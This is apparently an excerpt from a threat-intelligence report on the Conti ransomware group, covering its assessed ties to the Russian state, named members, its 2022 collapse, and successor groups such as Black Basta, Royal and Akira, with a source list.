"Our old case was resumed... The Americans officially requested information about Russian hackers... Next Tuesday, the investigator called us for a conversation, but for now, it's like [we're being called on as] witnesses. That way if the case is suspended, they can't interrogate us in any way."

Conti member "Kagas" to Stern, October 2021 (leaked chat log)

A separate Conti member immediately reported that the group's contacts had assured it the Russian-side investigation would go nowhere and would be closed by mid-November 2021. This same period saw Russian investigators appearing more interested in pursuing REvil members than Conti, culminating in the January 2022 FSB arrests of REvil, which many analysts assessed as a political gesture timed to the Ukraine buildup. The leaked chats also reference Liteyny Avenue in Saint Petersburg, home to FSB offices, in a context suggesting external contact with a helpful government-adjacent source. [10][22]

Vendor Assessments
Vendor | Assessment | Date
Mandiant | "At least a portion of actors involved with CONTI ransomware are based in Russia and some criminals operating from there already have documented ties with Russian intelligence apparatus. More recently, publicly reported chat logs suggest that a key player in CONTI operations may have intended to provide support for government projects." | Feb 2022
U.S. Department of State | Explicitly labeled Conti a "Russian government-linked ransomware-as-a-service (RaaS) group" in the August 2022 Rewards for Justice announcement. Strongest public U.S. government characterization; falls short of confirming a formal intelligence relationship. | Aug 2022
Recorded Future (Dark Covenant 3.0) | Documents an ongoing pattern of Russian government tolerance for cybercriminal activity in exchange for geopolitical utility; Conti cited as the defining case study of the protected criminal enterprise model. | Oct 2025
Assessment Summary

The available evidence supports a moderate-to-high confidence assessment of implicit state toleration. Conti received advance warning of Russian investigative activity, operated openly in Russia without prosecution, and consistently avoided CIS targets across 1,000+ documented attacks. The leaked chats document direct back-channel communication between Conti leadership and Russian law enforcement. A formal, active intelligence-sharing or tasking relationship cannot be confirmed from public evidence. The most likely arrangement is convergence of interest rather than direction: Conti's attacks generated hard currency and geopolitical leverage that served Russian state interests without requiring formal tasking. The protected criminal enterprise model gives the state those operational benefits while preserving its deniability.

Analyst Inference: Active FSB tasking

The reference to Liteyny Avenue (the Saint Petersburg street housing the FSB's regional headquarters) in leaked communications, combined with the demonstrated advance warning of law enforcement inquiries, is consistent with an active FSB liaison relationship rather than passive tolerance. This remains analyst inference; the chats establish contact but not formal tasking. [10][48]

Named Individuals (Confirmed Attribution)
Alias | Real Name | Age | Nationality | Role | Source
Stern / Ben / Demon | Vitaly Nikolaevich Kovalev | 36 | Russian | Founder/CEO of TrickBot and Conti; supreme leader | BKA Germany; GangExposed 2025 [25][19]
Professor | Vladimir Viktorovich Kvitko | 39 | Russian (Dubai) | Senior general; offshore operations; Dubai hub | GangExposed 2025; US RFJ bounty [26][18]
Mango | Mikhail Mikhailovich Tsaryov (transliterated "Tsarev" in the DOJ indictment and sanctions listings) | N/A | Russian | Mid-level manager; day-to-day operations | DOJ indictment 2023; GangExposed [16][18]
Defender | Andrey Yuryevich Zhuykov | N/A | Russian | Lead systems administrator | DOJ indictment; UK FCDO sanction [16][17]
Bentley | Maksim Galochkin | N/A | Russian | Crypter / obfuscation; indicted in three jurisdictions | DOJ indictment [16]
Buza | Maksim Rudenskiy | N/A | Russian | Developer supervisor | DOJ indictment [16]
Target | Unidentified | N/A | Assessed Russian | Senior leader; luxury assets (Ferrari, Maybach) | US RFJ $10M bounty; photo released Aug 2022 [27]
10 Trajectory Assessment and Diaspora
Why Conti Collapsed

The Conti collapse was an own-goal triggered by geopolitics. The group's public declaration of support for Russia's invasion of Ukraine was catastrophically ill-considered:

  • It exposed the group's Russian identity and state alignment to affiliates who had operational security reasons to maintain deniability
  • It triggered the Ukrainian insider who had penetrated Conti's infrastructure to act, releasing the most comprehensive criminal organization leak in cybercrime history
  • It made the Conti brand a liability for victims: paying Conti created sanctions violation exposure under OFAC
  • It caused direct internal fracture along ethnic lines, with Ukrainian members becoming adversaries

AdvIntel's Boguslavskiy and Kremez concluded: "The Conti brand, not the organization itself, is shutting down." The Costa Rica attack served simultaneously as a final high-profile operation, cover for migrating members and infrastructure, and a capability demonstration to affiliates considering defection to competing groups. [15][14]

Predecessor and Absorbed Infrastructure
Group | Relationship to Conti | Evidence Basis | Confidence
TrickBot | Absorbed by Conti; shared personnel and leadership | Chat logs; DOJ indictments confirm shared defendants | CONFIRMED
Ryuk | Technical and personnel predecessor | Code overlap; personnel (Professor's code comment); TRM Labs blockchain forensics | CONFIRMED
Emotet ("Booz") | Distribution partner and platform | Chat logs confirm deep integration; Emotet had 50+ coders referenced | CONFIRMED
BazarLoader/BazarBackdoor | Distribution vehicle replacing TrickBot | CISA advisory; security research | CONFIRMED
Successor and Diaspora Groups

Court-Confirmed Cluster: The DOJ's May 2026 sentencing of Deniss Zolotarjovs provides court-confirmed documentation of the Conti cluster model. His organization used ransom note brands including Conti, Karakurt, Royal, TommyLeaks, SchoolBoys Ransomware, and Akira, confirming these were overlapping operational identities used by the same core actor network, not independent organizations. [6][47]

Group | Relationship | Status (May 2026) | Key Evidence | Confidence
Black Basta | Conti offshoot; emerged April 2022 | Defunct (Feb 2025, own chat leak) | Shared TTPs; Black Basta leaked chats confirmed former Conti actors; TRM Labs blockchain analysis | HIGH (Analyst1, TRM Labs) [49][50]
Karakurt | Conti side operation / extortion-only branch | Active (reduced) | Blockchain analysis: direct wallet connections to Conti; Arctic Wolf and Chainalysis corroboration; Zolotarjovs sentence confirms overlap [51] | HIGH
Royal / BlackSuit | Conti member continuation; assessed core Wizard Spider tier | Active as BlackSuit | BushidoToken threat intel; shared personnel and infrastructure indicators; FBI advisory confirms Conti connection [52] | MEDIUM-HIGH
Akira | Conti operator continuation; affiliate and mid-tier operator continuity | Active (2026) | Blockchain evidence (TRM Labs 2026); shared laundering infrastructure; Russian-language artifacts; US sanctions and Zolotarjovs sentence confirm Conti lineage [4][6] | HIGH
BlackByte | Conti spinoff | Active (reduced) | AdvIntel/Kremez assessment; infrastructure overlap [15] | MEDIUM
Diavol | Conti/TrickBot sub-operation | Largely dormant | Code and infrastructure analysis; Arctic Wolf [51] | MEDIUM-HIGH
Analyst Inference: Cyclical Collapse Pattern

The February 2025 Black Basta internal chat leak followed the same pattern as the original Conti leak: an insider/disgruntled member published internal communications, directly contributing to the group's dissolution. The Conti diaspora appears condemned to repeat the cycle. The organizational model of large, salaried, multi-ethnic workforces creates structural insider threat exposure that pure-affiliate models do not share. Each generation of Conti-lineage groups inherits both the operational playbook and this structural vulnerability.

Intelligence Gaps (May 2026)
  • "Target" identity: Despite a $10M U.S. bounty and GangExposed's stated intent to identify him, Target's real name has not been publicly confirmed
  • Full financial scope: Total cryptocurrency holdings and current wallet infrastructure of the Conti diaspora are partially mapped but not fully documented
  • Formal state intelligence relationship: The exact nature of FSB involvement or passive tolerance remains an open question; leaked chats establish back-channel contact but not formal tasking
  • GangExposed identity and motivation: Source's own identity, access method, and motivations remain unconfirmed; possibility that GangExposed is state-adjacent cannot be ruled out
  • Akira/Royal operational leadership: Actor overlap assessed with high confidence; full attribution of current operational leadership to specific former Conti individuals is incomplete in public reporting
11 Sources
    [1] Rapid7 Blog: Conti Ransomware Group Internal Chats Leaked, March 2022: rapid7.com
    [2] BleepingComputer: Conti ransomware gang chats leaked by pro-Ukraine member, February 2022: bleepingcomputer.com
    [4] CybelAngel: Akira Ransomware: The Conti Successor Targeting the West, April 2026: cybelangel.com
    [5] Krebs on Security: Conti Ransomware Group Diaries, Part IV: Cryptocrime: krebsonsecurity.com
    [6] DOJ: Member of Prolific Russian Ransomware Group Sentenced to Prison, May 2026: justice.gov
    [8] Rapid7: Conti Unpacked: Understanding Ransomware Development As a Business: rapid7.com
    [9] CrowdStrike: WIZARD SPIDER Update: Resilient, Reactive and Resolute, 2020: crowdstrike.com
    [10] Krebs on Security: Conti Ransomware Group Diaries, Part I: Evasion: krebsonsecurity.com
    [11] CISA/FBI/NSA Advisory AA21-265A: Conti Ransomware, September 2021: cisa.gov
    [12] HSE: Conti Cyber Attack Post Incident Review, 2021: hse.ie
    [13] Secureworks / Zscaler: Conti ransomware operations surge despite recent leak, 2022: zscaler.com
    [14] Morphisec: Conti Ransomware Group = Costa Rican Nightmare, 2022: morphisec.com
    [15] BleepingComputer: Conti Ransomware Operation Shut Down After Splitting into Smaller Groups, 2022: bleepingcomputer.com
    [16] DOJ: Multiple Foreign Nationals Charged in Connection with Trickbot Malware and Conti Ransomware Conspiracies, September 2023: justice.gov
    [17] UK FCDO / U.S. Treasury: UK and US sanction Conti and Trickbot ransomware gang members, September 2023: gov.uk
    [18] The Register: Mysterious leaker GangExposed outs Conti ransomware kingpins, May 2025: theregister.com
    [19] BleepingComputer: Germany doxxes Conti ransomware and TrickBot ring leader, 2025: bleepingcomputer.com
    [22] TRM Labs: TRM Analysis Corroborates Suspected Ties Between Conti and Ryuk: trmlabs.com
    [23] Krebs on Security: Conti Ransomware Group Diaries, Part II: The Office: krebsonsecurity.com
    [24] BleepingComputer: Conti ransomware shuts down operation, rebrands into smaller units: bleepingcomputer.com
    [25] SecurityWeek: Alleged Conti, TrickBot Gang Leader Unmasked, 2025: securityweek.com
    [27] U.S. Rewards for Justice: US offers $10M reward for info on five Conti ransomware members, August 2022: rewardsforjustice.net
    [30] Bitdefender: Free Conti Ransomware Decryptor Released, 2022: bitdefender.com
    [37] HSE / Panaseer: What the Irish Cyber Attack Tells Us About Security Controls (March–May 2021 timeline): panaseer.com
    [40] Krebs on Security: Conti Ransomware Group Diaries, Part IV: Cryptocrime: krebsonsecurity.com
    [41] U.S. State Department: US Government Offers $15M Reward for Info on Conti Actors, May 2022: rewardsforjustice.net
    [42] Reuters / AP: Costa Rica declares national emergency after Conti ransomware attack, May 2022
    [47] CyberScoop: Latvian national sentenced for ransomware attacks run by former Conti leaders, 2026: cyberscoop.com
    [48] Wired UK: Leaked Ransomware Docs Show Conti Helping Putin From the Shadows, March 2022: wired.co.uk
    [49] Analyst1: Black Basta Threat Actor Profile: analyst1.com
    [51] Arctic Wolf: The Karakurt Web: Threat Intel and Blockchain Analysis: arcticwolf.com
    [52] BushidoToken: The Continuity of Conti, 2022: bushidotoken.net